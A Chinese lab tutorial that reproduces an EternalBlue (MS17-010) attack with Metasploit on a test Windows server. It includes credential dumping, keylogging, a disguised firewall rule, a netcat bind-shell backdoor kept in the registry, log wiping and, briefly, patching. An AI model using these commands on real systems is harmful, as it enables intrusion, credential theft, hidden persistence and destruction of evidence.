当前位置：首页 > article >正文

永恒之蓝完全实战：从SMB扫描到SYSTEM权限，注册表后门+键盘记录+清日志一条龙

article 2026/5/10 10:43:13

摘要永恒之蓝MS17-010是2017年WannaCry勒索病毒的罪魁祸首利用SMBv1协议漏洞可远程获取Windows系统最高权限。本文将基于Kali Linux 2026.1与Windows Server 2008 R2靶机使用Metasploit完整演示漏洞扫描、永恒之蓝攻击获取Meterpreter Shell、后渗透阶段的hash抓取、Kiwi明文密码提取、进程迁移、键盘记录、关闭UAC、利用注册表植入NC后门实现开机自启持久化控制、防火墙策略调整以及最终通过安装官方补丁彻底免疫。同时深入解析NetcatNC的诞生故事与核心功能。全文旨在帮助读者理解完整攻击链路、持久化技巧与防御要点。一、实验环境说明设备角色操作系统 / 版本IP地址攻击机Kali Linux 2026.1MSFconsole 6.x10.0.0.129/24靶机Windows Server 2008 R264位10.0.0.152/24网络要求攻击机与靶机同一网段能互相ping通靶机445端口可访问。注意靶机必须开启SMBv1协议Windows Server 2008 R2默认开启且未打KB4013389等补丁。二、Netcat简介网络工具中的瑞士军刀Netcat简称nc被誉为“网络工具中的瑞士军刀”由Hobbit于1995年首次发布。它体积小巧几十KB但功能极其强大可以在两台设备之间建立TCP/UDP连接实现数据交互。核心功能侦听模式在一台设备上开启端口监听等待连接。传输模式从一台设备主动连接到另一台设备的监听端口。端口扫描探测目标开放端口。文件传输通过重定向发送/接收文件。后门通道将命令行绑定到某个端口远程执行系统命令。为什么它适合做后门攻击者获得系统权限后可以将nc.exe上传到受害者主机并配置为开机自启。之后任何时刻攻击者只需nc 目标IP 端口就能获得一个远程命令行且不会在目标上留下明显的恶意进程名称。在本次实验中我们将利用nc在Windows靶机上建立一个开机自启的后门实现持久化控制。三、漏洞传奇从NSA武器库到全球勒索风暴漏洞编号MS17-010包含CVE-2017-0143 ~ CVE-2017-0148影响组件Windows SMBv1 协议理论危害等级严重远程代码执行无需认证故事时间线2017年3月黑客组织Shadow Brokers泄露了NSA美国国家安全局的一批黑客工具其中包括“永恒之蓝”EternalBlue。2017年4月微软紧急发布安全更新MS17-010补丁KB4013389等但大量用户未及时安装。2017年5月12日WannaCry勒索病毒爆发利用永恒之蓝漏洞在短短几天内感染全球150多个国家30万台电脑造成数十亿美元损失。2017年5月13日一名安全研究员注册了病毒代码中的kill‑switch域名意外阻止了传播但变种仍层出不穷。漏洞原理简版SMBv1在处理特定类型的数据包时存在多个缓冲区溢出漏洞。攻击者可发送精心构造的SMB消息触发内核态代码执行从而获得SYSTEM权限。影响系统未打补丁Windows Vista / 7 / 8 / 8.1Windows Server 2008 / 2008 R2 / 2012 / 2012 R2Windows 10 早期版本已修复四、攻击阶段从扫描到获得Meterpreter Shell步骤1启动MSF并搜索永恒之蓝模块msfconsole -q msf search ms17-010关键模块auxiliary/scanner/smb/smb_ms17_010—— 扫描检测模块exploit/windows/smb/ms17_010_eternalblue—— 攻击利用模块auxiliary/admin/smb/ms17_010_command—— 命令执行辅助模块步骤2扫描确认漏洞存在msf use auxiliary/scanner/smb/smb_ms17_010 msf set RHOSTS 10.0.0.152 msf run输出应包括[] 10.0.0.152:445 - Host is likely VULNERABLE to MS17-010!步骤3发起攻击获取Meterpretermsf back msf use exploit/windows/smb/ms17_010_eternalblue msf set RHOSTS 10.0.0.152 msf run成功后会进入验证权限meterpreter getuid # 获取用户信息五、后渗透阶段占领军全面控制5.1 基础信息收集meterpreter sysinfo meterpreter ipconfig meterpreter shell C:\Windows\system32chcp 65001 chcp 65001 Active code page: 65001 C:\Windows\system32 whoami nt authority\system C:\Windows\system32 exit5.2 抓取密码哈希hashdumpmeterpreter hashdump得到的NTLM哈希可尝试在线MD5解密网站如cmd5.com破解。尝试通过破解的密码进行远程连接5.3 使用Kiwi模块抓取明文密码Kiwi是Mimikatz的MSF集成版可从内存中提取明文密码。meterpreter load kiwi meterpreter help kiwi meterpreter creds_all如果靶机上有登录过的账户可能直接输出明文密码。5.4 进程迁移提高稳定性默认Meterpreter进程可能不稳定迁移到合法进程如explorer.exemeterpreter ps -S explore # 找到explorer.exe的PID meterpreter migrate 1234 # 替换为目标PID meterpreter getuid5.5 键盘记录meterpreter run post/windows/capture/keylog_recorder然后在Windows靶机上打开记事本随意输入一些文字。另打开一个Kali终端查看记录cat /root/.msf4/loot/20260509205936_default_10.0.0.152_host.windows.key_221376.txt5.6 关闭防火墙或添加后门规则方法一粗暴关闭防火墙meterpreter shell C:\Windows\system32chcp 65001 C:\Windows\system32 netsh advfirewall set allprofiles state on #开启防火墙 C:\Windows\system32 netsh advfirewall set allprofiles state off #关闭防火墙方法二添加隐蔽入站规则推荐C:\Windows\system32 netsh advfirewall firewall add rule nameWindowsUpdate dirin actionallow protocoltcp localport4444然后在Windows靶机上打开“高级安全Windows防火墙”查看入站规则可以看到名为“WindowsUpdate”的规则。5.7 关闭UAC用户账户控制UAC会弹窗提醒权限提升操作关闭后可使后门更隐蔽。查看靶机当前UAC级别默认是关闭的运行输入msconfig先打开操作注册表关闭UACreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5.8 利用注册表添加NC后门持久化控制第一步上传nc.exe到靶机Kali默认自带nc.exe路径为/usr/share/windows-binaries/nc.exe。在Meterpreter中上传meterpreter upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32\\验证上传成功meterpreter ls C:\\windows\\system32\\nc.exe第二步利用注册表添加开机自启后门设置注册表键值使系统每次启动时自动运行nc.exe监听4444端口并将cmd.exe绑定到该端口。meterpreter reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d C:\\windows\\system32\\nc.exe -Ldp 4444 -e cmd.exe参数解释-L持续监听即使连接断开仍继续等待Windows版特有。-d后台运行不弹出窗口。-p 4444监听端口4444。-e cmd.exe连接后执行cmd.exe给予攻击者Shell。第三步查询注册表键值是否添加成功meterpreter reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run输出中应包含新创建的项nc。查询详细内容meterpreter reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc应显示Key: HKLM\software\microsoft\windows\currentversion\RunName: ncType: REG_SZData: C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe第四步远程启动后门或等待靶机重启无需重启立即手动启动后门meterpreter shell C:\Windows\system32 nc.exe -Ldp 4444 -e cmd.exe此时nc开始在后台监听4444端口。若靶机防火墙开启需放行4444端口或暂时关闭防火墙可参考5.6第五步攻击机连接后门在Kali新终端中保持MSF会话存在或退出nc 10.0.0.152 4444连接成功后你将获得靶机的cmd命令行至此即使MSF的Meterpreter会话断开只要靶机重启或nc进程存活攻击者仍可通过nc 10.0.0.152 4444随时获得命令行实现持久化后门。5.9 清空事件日志擦除痕迹meterpreter clearev此命令清除应用程序、系统和安全日志。再去靶机的“事件查看器” → “Windows日志” → “安全”中查看会发现日志已被清空。六、防御阶段安装补丁封神补丁信息安全公告MS17-010对应KB编号Windows Server 2008 R2KB4012215下载地址https://catalog.update.microsoft.com/Search.aspx?qKB4012215安装与验证下载补丁并拷贝到靶机运行安装程序完成后重启此补丁需要在安装了SP1补丁的前提下安装可参考上篇文章再次使用MSF扫描模块msf use auxiliary/scanner/smb/smb_ms17_010 msf set RHOSTS 10.0.0.152 msf run输出变为[] Host does NOT appear vulnerable。攻击模块无法再获取Shell。结论安装补丁后永恒之蓝漏洞被彻底封堵。七、总结本文针对MS17-010永恒之蓝SMBv1远程代码执行漏洞在Kali Linux 2026.1攻击机10.0.0.129与未打补丁的Windows Server 2008 R2靶机10.0.0.152环境中完整复现了从漏洞扫描、攻击利用到后渗透控制及持久化后门植入的全过程。实验首先使用Metasploit扫描模块确认目标脆弱随后通过永恒之蓝攻击模块成功获取SYSTEM权限的Meterpreter会话。在后渗透阶段依次执行了哈希抓取、Kiwi模块提取明文密码、进程迁移、键盘记录、关闭UAC等操作并重点演示了利用NetcatNC上传后门程序、通过注册表添加开机自启项、实现持久化远程命令行访问的技术细节最后使用clearev命令清除系统日志以掩盖痕迹。同时本文介绍了Netcat作为“网络瑞士军刀”的诞生背景与核心功能。实验最后通过安装微软官方安全更新KB4013389彻底修复漏洞验证了补丁的有效性。结果表明永恒之蓝漏洞利用方式成熟、危害极大且攻击者可结合注册表持久化技术长期控制目标防御方必须及时安装补丁并定期检查注册表启动项及异常进程。重要声明本教程及文中所有操作仅限于合法授权的安全学习与研究。作者及发布平台不承担因不当使用本教程所引发的任何直接或间接法律责任。请务必遵守中华人民共和国网络安全相关法律法规。如果这篇文章帮你解决了实操上的困惑别忘记点击点赞、分享也可以留言告诉我你遇到的其它问题我会尽快回复。你的关注是我坚持原创和细节共享的力量来源谢谢大家。

永恒之蓝完全实战：从SMB扫描到SYSTEM权限，注册表后门+键盘记录+清日志一条龙

相关文章：

永恒之蓝完全实战：从SMB扫描到SYSTEM权限，注册表后门+键盘记录+清日志一条龙

终极键盘连击修复方案：Keyboard Chatter Blocker 拯救你的机械键盘

如何用MOOTDX在5分钟内搭建免费的Python量化数据平台

构建全球AI治理框架：跨国法律协调与监管机构设计

NS-USBLoader：一站式解决Switch文件传输与系统注入的三大核心挑战

电动汽车动力总成悬置系统稳健优化与结构设计【附仿真】

从零到一：用C语言在Ubuntu 20.04上搭建你的第一个网络聊天室（附完整源码和VS Code配置）

FPGA测控接收机频域空时自适应抗干扰滤波方法【附程序】

跨平台文件共享实战：从中标麒麟OS无缝访问Win10 SMB共享

Claw-Swarm V9.2：基于信号场与群体智能的多智能体协作框架解析

一键搞定完整网页截图：终极Chrome扩展让你的长页面保存变得如此简单

开源提示词管理平台OpenPrompt：开发者如何自建AI提示词库

从硬件新手到AMD Ryzen调试专家：SMUDebugTool的完整技能树指南

MindSpore分布式并行原理与实战

OpenClaw插件实战：一键审批按钮提升AI自动化交互效率

Excel平均值函数全解析：AVERAGE、AVERAGEIF、AVERAGEIFS与AVERAGEA实战选型指南

如何让任意窗口保持置顶？AlwaysOnTop工具3分钟上手指南

3个突破性技巧：用WPS-Zotero重塑你的学术写作体验

PyWxDump：从微信数据解析工具到开源合规的重要一课

3个创意方案：用Sunshine构建你的跨设备游戏串流中心

3分钟玩转PCL启动器：让你的Minecraft体验飞升的秘密武器 [特殊字符]

多智能体AI系统协同韧性：定义、量化与架构设计实战

平衡车/四轴飞行器新手必看：用互补滤波搞定姿态解算，5分钟讲清陀螺仪和加速度计怎么‘合作’

面试拷打：Nacos 注册中心怎么实现的？答出 Distro / Raft 才算入门

SAP ABAP SM30表维护视图：如何给自定义表加上业务审批和日期防重规则？

CANN Cosmos NPU多卡并行优化

CANN/cann-recipes-train基于verl-retool的agent样例

G-Helper终极指南：如何用这款轻量级工具彻底释放你的华硕笔记本潜能

基于OpenClaw的微信个人号本地集成开发指南

Python uAgents框架实战：从零构建分布式AI智能体系统